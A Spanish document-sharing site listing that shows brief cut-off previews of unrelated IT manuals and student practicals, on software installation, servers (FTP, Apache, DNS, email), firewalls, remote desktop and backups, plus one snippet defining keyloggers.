Instrucciones de instalación de IBM SPSS Modeler (licencia de usuario autorizado)

Instrucciones de instalación de IBM SPSS Modeler (licencia de usuario autorizado) Instrucciones de instalación de IBM SPSS Modeler (licencia de usuario autorizado) Contenido Instrucciones para la instalación.... 1 Requisitos del sistema........... 1 Código de autorización..........

Más detalles

ENVÍO DE E-MAIL POR MEDIO DE SMTP

ENVÍO DE E-MAIL POR MEDIO DE SMTP UNIVERSIDAD TÉCNICA FEDERICO SANTA MARÍA DEPARTAMENTO DE ELECTRÓNICA ELO 322: REDES DE COMPUTADORES I ENVÍO DE E-MAIL POR MEDIO DE SMTP Alumnos Ariel Mancilla G. 2521040-9 Daniel Spataris J. 2521029-8

Más detalles

Toda base de datos relacional se basa en dos objetos

Toda base de datos relacional se basa en dos objetos 1. INTRODUCCIÓN Toda base de datos relacional se basa en dos objetos fundamentales: las tablas y las relaciones. Sin embargo, en SQL Server, una base de datos puede contener otros objetos también importantes.

Más detalles

HOW TO SOBRE FIREWALL

HOW TO SOBRE FIREWALL HOW TO SOBRE FIREWALL 1- En este how to estaremos estableciendo algunas reglas con el firewall para bloquear el acceso, o permitirlo. Lo primero que haremos es abrir la consola, ubicada en aplicaciones,

Más detalles

MANUAL DE USUARIO AVMsorguar

MANUAL DE USUARIO AVMsorguar MANUAL DE USUARIO AVMsorguar TABLA DE CONTENIDO TABLA DE CONTENIDO...1 INSTALADOR...2 INSTALACION...3 MANUAL DE USO...8 DESCARGA DE DATOS...8 CONFIGURACION DEL AVM...9 VISUALIZACION DE LOS DATOS...10 MANEJO

Más detalles

ICARO MANUAL DE LA EMPRESA

ICARO MANUAL DE LA EMPRESA ICARO MANUAL DE LA EMPRESA 1. ENTRANDO EN ICARO Para acceder al Programa ICARO tendremos que entrar en http://icaro.ual.es Figura 1 A continuación os aparecerá la página de Inicio del aplicativo ICARO.

Más detalles

Guía de uso del sistema CV-Online

Guía de uso del sistema CV-Online Guía de uso del sistema CV-Online 1.- Registro. a.- Pasos para completar el formulario. 2.- Ingreso al sistema. a.- Olvidó su Usuario o contraseña? b.- Consulta. c.- Crear nueva cuenta. 3.- Administrador

Más detalles

IS23 Mantenimiento de Instalaciones Informáticas Práctica 6. Acceso remoto a ordenadores tipo PC

IS23 Mantenimiento de Instalaciones Informáticas Práctica 6. Acceso remoto a ordenadores tipo PC IS23 Mantenimiento de Instalaciones Informáticas Práctica 6. Acceso remoto a ordenadores tipo PC 1 Objetivos Ingeniería Técnica Informática de Sistemas Curso 2003/2004 En la presente sesión se pretende

Más detalles

GUÍA PARA LA INSTALACIÓN DE MOODLE EN UN COMPUTADOR PERSONAL QUE USA EL SISTEMA OPERATIVO MS. WINDOWS

GUÍA PARA LA INSTALACIÓN DE MOODLE EN UN COMPUTADOR PERSONAL QUE USA EL SISTEMA OPERATIVO MS. WINDOWS GUÍA PARA LA INSTALACIÓN DE MOODLE EN UN COMPUTADOR PERSONAL QUE USA EL SISTEMA OPERATIVO MS. WINDOWS Objetivo: El propósito de esta guía es indicarle como configurar un entorno moodle de prácticas en

Más detalles

Instituto Tecnológico de Las América. Materia Sistemas operativos III. Temas. Facilitador José Doñe. Sustentante Robín Bienvenido Disla Ramirez

Instituto Tecnológico de Las América. Materia Sistemas operativos III. Temas. Facilitador José Doñe. Sustentante Robín Bienvenido Disla Ramirez Instituto Tecnológico de Las América Materia Sistemas operativos III Temas Servidor Web Apache Facilitador José Doñe Sustentante Robín Bienvenido Disla Ramirez Matricula 2011-2505 Grupo 1 Servidor Web

Más detalles

Práctica de Seguridad en Redes

Práctica de Seguridad en Redes Práctica de Seguridad en Redes Juan Boubeta Puig y Antonio García Domínguez Seguridad y Competencias Profesionales Departamento de Ingenieria Informatica Universidad de Cadiz Curso 2012-2013 1. Descripción

Más detalles

Cómo usar Subversion. con Windows XP/2000/2003.

Cómo usar Subversion. con Windows XP/2000/2003. con Windows XP/2000/2003. Creado por: Fecha de creación: Domingo, 04 de Septiembre de 2005 Revisión: 1 Última modificación: Sábado, 10 de Septiembre de 2005 Índice Cómo usar Subversion... 1 Índice... 2

Más detalles

ISCAN - MANUAL DE INSTALACIÓN

ISCAN - MANUAL DE INSTALACIÓN ISCAN - MANUAL DE INSTALACIÓN iscan es un software desarrollado y facilitado por INTECO (Instituto Nacional de Tecnología de la Comunicación) que realiza un análisis mensual del sistema y su seguridad

Más detalles

Guía de Inicio Respaldo Cloud

Guía de Inicio Respaldo Cloud Guía de Inicio Respaldo Cloud Calle San Rafael, 14 28108 Alcobendas (Madrid) 900 103 293 www.acens.com Contenido 1 Introducción... 3 2 Características Respaldo Cloud... 4 3 Acceso y activación... 5 - Gestión

Más detalles

Propuesta de Portal de la Red de Laboratorios Virtuales y Remotos de CEA

Propuesta de Portal de la Red de Laboratorios Virtuales y Remotos de CEA Propuesta de Portal de la Red de Laboratorios Virtuales y Remotos de CEA Documento de trabajo elaborado para la Red Temática DocenWeb: Red Temática de Docencia en Control mediante Web (DPI2002-11505-E)

Más detalles

Qué es un servicio de Proxy?

Qué es un servicio de Proxy? TEMA 6 6.6. Proxy Qué es un servicio de Proxy? l Un servicio de Proxy, es la técnica u:lizada para almacenar páginas de Internet y así ser u:lizadas posteriormente, l a esta técnica, también se le conoce

Más detalles

5. Composer: Publicar sus páginas en la web

5. Composer: Publicar sus páginas en la web 5. Composer: Publicar sus páginas en la web Si nuestras páginas existen únicamente en el disco duro local, sólo nosotros podremos navegar por ellas, pero nadie más podrá hacerlo. Composer nos permite publicarlas

Más detalles

Capítulo 1: Empezando...3

Capítulo 1: Empezando...3 F-Secure Anti-Virus for Mac 2014 Contenido 2 Contenido Capítulo 1: Empezando...3 1.1 Qué hacer después de la instalación?...4 1.1.1 Administrar la suscripción...4 1.1.2 Abrir el producto...4 1.2 Cómo asegurarme

Más detalles

GENERACIÓN DE ANTICIPOS DE CRÉDITO

GENERACIÓN DE ANTICIPOS DE CRÉDITO GENERACIÓN DE ANTICIPOS DE CRÉDITO 1 INFORMACIÓN BÁSICA La aplicación de generación de ficheros de anticipos de crédito permite generar fácilmente órdenes para que la Caja anticipe el cobro de créditos

Más detalles

Manual CMS Mobincube

Manual CMS Mobincube Manual CMS Mobincube CMS Mobincube Qué es? El CMS (Sistema de Gestión de Contenidos) es un completo website que permite la creación y actualización de contenido remoto. De esta forma, una vez creada una

Más detalles

Accede a su DISCO Virtual del mismo modo como lo Hace a su disco duro, a través de:

Accede a su DISCO Virtual del mismo modo como lo Hace a su disco duro, a través de: Gemelo Backup Online DESKTOP Manual DISCO VIRTUAL Es un Disco que se encuentra en su PC junto a las unidades de discos locales. La información aquí existente es la misma que usted ha respaldado con su

Más detalles

MANUAL DE USUARIO APLICACIÓN SYSACTIVOS

MANUAL DE USUARIO APLICACIÓN SYSACTIVOS MANUAL DE USUARIO APLICACIÓN SYSACTIVOS Autor Edwar Orlando Amaya Diaz Analista de Desarrollo y Soporte Produce Sistemas y Soluciones Integradas S.A.S Versión 1.0 Fecha de Publicación 19 Diciembre 2014

Más detalles

Selección de los puntos de montaje

Selección de los puntos de montaje PARTICIONES PARA LINUX Selección de los puntos de montaje Tanto para aquellos que vayan a instalar ahora, como para quienes quieran cambiar el tamaño de una partición o formatear este apunte (resumen de

Más detalles

MANUAL BASICO DE WEBEX

MANUAL BASICO DE WEBEX MANUAL BASICO DE WEBEX Webex es un servicio de web conferencias y soluciones de colaboración, lo que significa que nos permite crear una conferencia por internet en la cual además de vernos los unos a

Más detalles

Manual hosting acens

Manual hosting acens Manual hosting acens Contenido Acceso al panel de control de cliente... 3 Asociar un dominio a mi Hosting... 5 Acceso al panel de administración del hosting... 7 INICIO - Visión general del estado de nuestro

Más detalles

Capítulo 5: Pruebas y evaluación del sistema. A continuación se muestran una serie de pruebas propuestas para evaluar varias

Capítulo 5: Pruebas y evaluación del sistema. A continuación se muestran una serie de pruebas propuestas para evaluar varias Capítulo 5: Pruebas y evaluación del sistema 5.1 Definición de pruebas para la aplicación A continuación se muestran una serie de pruebas propuestas para evaluar varias características importantes del

Más detalles

Manual de Instalación Declaración y Liquidación Modelos 110-111

Manual de Instalación Declaración y Liquidación Modelos 110-111 Manual de Instalación Declaración y Liquidación Modelos 110-111 GNU/Linux Ubuntu 11.10 Fedora 16 OpenSuSe 11.4 Irontec S.L. 2012 Este manual esta desarrollado por la empresa Irontec: Internet y Sistemas

Más detalles

MANUAL PARA GESTIÓN DE INCIDENCIAS INFORMÁTICAS

MANUAL PARA GESTIÓN DE INCIDENCIAS INFORMÁTICAS MANUAL PARA GESTIÓN DE INCIDENCIAS INFORMÁTICAS En este manual aprenderemos a introducir un Ticket de Soporte (Incidencia Informática) y ver todo el proceso hasta que se resuelve. Para poder escribir Tickets

Más detalles

Introducción a los sitios de SharePoint en Office 365

Introducción a los sitios de SharePoint en Office 365 Introducción a los sitios de SharePoint en Office 365 Universidad Central del Este Contenido 1. QUÉ ES UN SITIO SHAREPOINT?... 3 2. CÓMO INGRESAR AL ÁREA DE SITIOS?... 3 3. DESCRIPCIÓN GENERAL DEL ÁREA

Más detalles

Manual de Integración CubeCart

Manual de Integración CubeCart Manual de Integración CubeCart Guía de integración de CubeCart con PagosOnline.net VERSIÓN 3.0 Capítulo 1. INTRODUCCIÓN CubeCart es una de las soluciones más populares para el desarrollo de Comercio Electrónico

Más detalles

Redes de área local: Aplicaciones y servicios WINDOWS

Redes de área local: Aplicaciones y servicios WINDOWS Redes de área local: Aplicaciones y servicios WINDOWS 4. Servidor DNS 1 Índice Definición de Servidor DNS... 3 Instalación del Servidor DNS... 5 Configuración del Servidor DNS... 8 2 Definición de Servidor

Más detalles

Manual de NetBeans y XAMPP

Manual de NetBeans y XAMPP Three Headed Monkey Manual de NetBeans y XAMPP Versión 1.0 Guillermo Montoro Delgado Raúl Nadal Burgos Juan María Ruiz Tinas Lunes, 22 de marzo de 2010 Contenido NetBeans... 2 Qué es NetBeans?... 2 Instalación

Más detalles

SERVICIO NACIONAL DE ADUANA DEL ECUADOR INSTRUCTIVO PARA DESCARGAR E INSTALAR EL AGENTE AVS PARA EL CHAT Y CONTROL REMOTO FEBRERO 2012

SERVICIO NACIONAL DE ADUANA DEL ECUADOR INSTRUCTIVO PARA DESCARGAR E INSTALAR EL AGENTE AVS PARA EL CHAT Y CONTROL REMOTO FEBRERO 2012 SERVICIO NACIONAL DE ADUANA DEL ECUADOR INSTRUCTIVO PARA DESCARGAR E INSTALAR EL AGENTE AVS PARA EL CHAT Y CONTROL REMOTO FEBRERO 2012 1 ÍNDICE 1. OBJETIVO... 3 2. ALCANCE... 3 3. RESPONSABILIDAD... 3

Más detalles

Formas de llevar a cabo un backup de una base de datos MySQL

Formas de llevar a cabo un backup de una base de datos MySQL Formas de llevar a cabo un backup de una base de datos MySQL Calle San Rafael, 14 28108 Alcobendas (Madrid) 902 90 10 20 www..com Introducción Muchas aplicaciones web hacen uso de bases de datos donde

Más detalles

CAPITULO IV. HERRAMIENTAS DE CÓDIGO ABIERTO

CAPITULO IV. HERRAMIENTAS DE CÓDIGO ABIERTO CAPITULO IV. HERRAMIENTAS DE CÓDIGO ABIERTO En la actualidad la mayoría de las grandes empresas cuentan con un sin número de servicios que ofrecen a sus trabajadores y clientes. Muchos de estos servicios

Más detalles

GENERACIÓN DE TRANSFERENCIAS

GENERACIÓN DE TRANSFERENCIAS GENERACIÓN DE TRANSFERENCIAS 1 INFORMACIÓN BÁSICA La aplicación de generación de ficheros de transferencias permite generar fácilmente órdenes para que la Caja efectúe transferencias, creando una base

Más detalles

Instalación de dos Sistemas Operativos en un mismo Computador

Instalación de dos Sistemas Operativos en un mismo Computador Instalación de dos Sistemas Operativos en un mismo Computador Si quieres tener los dos sistemas operativos en un mismo equipo y elegir, entre uno y otro, en el momento del arranque, debes realizar los

Más detalles

Adaptación al NPGC. Introducción. NPGC.doc. Qué cambios hay en el NPGC? Telf.: 93.410.92.92 Fax.: 93.419.86.49 e-mail:atcliente@websie.

Adaptación al NPGC. Introducción. NPGC.doc. Qué cambios hay en el NPGC? Telf.: 93.410.92.92 Fax.: 93.419.86.49 e-mail:atcliente@websie. Adaptación al NPGC Introducción Nexus 620, ya recoge el Nuevo Plan General Contable, que entrará en vigor el 1 de Enero de 2008. Este documento mostrará que debemos hacer a partir de esa fecha, según nuestra

Más detalles

Redes de área local: Aplicaciones y servicios WINDOWS

Redes de área local: Aplicaciones y servicios WINDOWS Redes de área local: Aplicaciones y servicios WINDOWS 7. Escritorio remoto 1 Índice Definición de Escritorio Remoto... 3 Habilitar Escritorio Remoto... 4 Instalación del cliente de Escritorio Remoto...

Más detalles

Instalación y Configuración de un Servidor FTP

Instalación y Configuración de un Servidor FTP 1 Instalación y Configuración de un Servidor FTP 1. Instalación del Servidor FTP Instalación y configuración del Servidor...3 Acceder al servidor...6 2. Configuración Pública del Servidor Configurar DHCP...8

Más detalles

Servidor Web Apache Knoppix Linux.-

Servidor Web Apache Knoppix Linux.- Servidor Web Apache Knoppix Linux.- El servidor HTTP Apache es un servidor web HTTP de código abierto, para plataformas Unix (BSD, GNU/Linux, etc.), Microsoft Windows, Macintosh y otras, que implementa

Más detalles

WINDOWS 2008 7: COPIAS DE SEGURIDAD

WINDOWS 2008 7: COPIAS DE SEGURIDAD 1.- INTRODUCCION: WINDOWS 2008 7: COPIAS DE SEGURIDAD Las copias de seguridad son un elemento fundamental para que el trabajo que realizamos se pueda proteger de aquellos problemas o desastres que pueden

Más detalles

TPV Táctil. Configuración y Uso. Rev. 1.2 21/01/09

TPV Táctil. Configuración y Uso. Rev. 1.2 21/01/09 Configuración y Uso Rev. 1.2 21/01/09 Rev. 2.0 20100616 1.- Ruta de Acceso a Imágenes. 2.- Estructuración de los Artículos. 3.- Creación de Grupos de Familias. 4.- Creación de Familias de Ventas. 5.- Creación

Más detalles

REDES DE ÁREA LOCAL. APLICACIONES Y SERVICIOS EN WINDOWS

REDES DE ÁREA LOCAL. APLICACIONES Y SERVICIOS EN WINDOWS REDES DE ÁREA LOCAL. APLICACIONES Y SERVICIOS EN WINDOWS Escritorio remoto - 1 - Escritorio Remoto...- 3 - Definición de Escritorio Remoto... - 3 - Habilitar Escritorio Remoto... - 4 - Instalación del

Más detalles

Haga clic en los recuadros donde indica la mano y regrese al inicio del capítulo al hacer clic en el título de la sección donde se encuentra

Haga clic en los recuadros donde indica la mano y regrese al inicio del capítulo al hacer clic en el título de la sección donde se encuentra Cómo gestiono el Plan Anual de Adquisiciones de mi Entidad en el SECOP II? Crear equipo Crear Plan Anual de Adquisiciones Publicar Plan Anual de Adquisiciones Modificar Plan Anual de Adquisiciones Buscar

Más detalles

Jorge García Delgado. 1.e.2 Uso del keylogger, Reveal Keylogger

Jorge García Delgado. 1.e.2 Uso del keylogger, Reveal Keylogger 1.e.1.- Introducción Un keylogger es un tipo de software o un dispositivo hardware específico que se encarga de registrar las pulsaciones que se realizan en el teclado, para posteriormente memorizarlas

Más detalles

Instituto Tecnológico de Las Américas (ITLA)

Instituto Tecnológico de Las Américas (ITLA) Instituto Tecnológico de Las Américas (ITLA) Sistema Operativo 3 (SO3) Abel Eliezer Mejía Amador Matricula: 2011-3891 How to: Servidor FTP Servidor FTP El protocolo FTP (File Transfer Protocol) es una

Más detalles

Creacion de Script. Que es un Script?

Creacion de Script. Que es un Script? Creacion de Script Que es un Script? Los scripts son un conjunto de instrucciones generalmente almacenadas en un archivo de texto que deben ser interpretados línea a línea en tiempo real para su ejecución,

Más detalles

CONCLUSIONES 155 A través de cada uno de los capítulos del presente documento se han enumerado una serie herramientas de seguridad que forman parte del sistema de defensa de una red y que, controlan su

Más detalles

Vielka Mari Utate Tineo 2013-1518. Instituto Tecnológico de las Américas ITLA. Profesor José Doñé. Sistema Operativo 3 PRACTICA NO. 16, SERVIDOR EMAIL

Vielka Mari Utate Tineo 2013-1518. Instituto Tecnológico de las Américas ITLA. Profesor José Doñé. Sistema Operativo 3 PRACTICA NO. 16, SERVIDOR EMAIL PRACTICA NO. 16, SERVIDOR EMAIL -EJEMPLO REAL DE USO DEL SERVIDOR DE EMAIL Vielka Mari Utate Tineo 2013-1518 Instituto Tecnológico de las Américas ITLA Profesor José Doñé Sistema Operativo 3 Vielka Utate

Más detalles

Programa de Ayuda EMCS Instalación Versión SQL Server Versión 1.0 - Marzo 2010

Programa de Ayuda EMCS Instalación Versión SQL Server Versión 1.0 - Marzo 2010 Programa de Ayuda EMCS Instalación Versión SQL Server Versión 1.0 - Marzo 2010 Programa de Ayuda EMCS Instalación Versión SQL Server Tabla de Contenido 1 INSTALACIÓN EN EL SERVIDOR...3 1.1 CREAR LA BASE

Más detalles

Notas para la instalación de un lector de tarjetas inteligentes.

Notas para la instalación de un lector de tarjetas inteligentes. Notas para la instalación de un lector de tarjetas inteligentes. Índice 0. Obtención de todo lo necesario para la instalación. 3 1. Comprobación del estado del servicio Tarjeta inteligente. 4 2. Instalación

Más detalles

Descarga Automática. Manual de Usuario. Operador del Mercado Ibérico de Energía - Polo Español Alfonso XI, 6 28014 Madrid

Descarga Automática. Manual de Usuario. Operador del Mercado Ibérico de Energía - Polo Español Alfonso XI, 6 28014 Madrid Descarga Automática Manual de Usuario Operador del Mercado Ibérico de Energía - Polo Español Alfonso XI, 6 28014 Madrid Versión 5.2 Fecha: 2008-10-15 Ref : MU_DescargaAutomática.doc ÍNDICE 1 INTRODUCCIÓN...

Más detalles

Scripts de arranque. Pablo Sanz Mercado.

Scripts de arranque. Pablo Sanz Mercado. Scripts de arranque. Pablo Sanz Mercado. 1 1. Configuración y comandos básicos. Los niveles de ejecución en Linux son las diferentes formas en las que podemos encontrar un sistema operativo Linux. Cuando

Más detalles

Instituto Tecnológico Las Américas (ITLA) Sistemas Operativos 3 (SO3) Daniel Alejandro Moreno Martínez. Matrícula: 2010-2946.

Instituto Tecnológico Las Américas (ITLA) Sistemas Operativos 3 (SO3) Daniel Alejandro Moreno Martínez. Matrícula: 2010-2946. Instituto Tecnológico Las Américas (ITLA) Sistemas Operativos 3 (SO3) Daniel Alejandro Moreno Martínez Matrícula: 2010-2946 How to How to: Servidor FTP!!! Servidor FTP El protocolo FTP (File Transfer Protocol)

Más detalles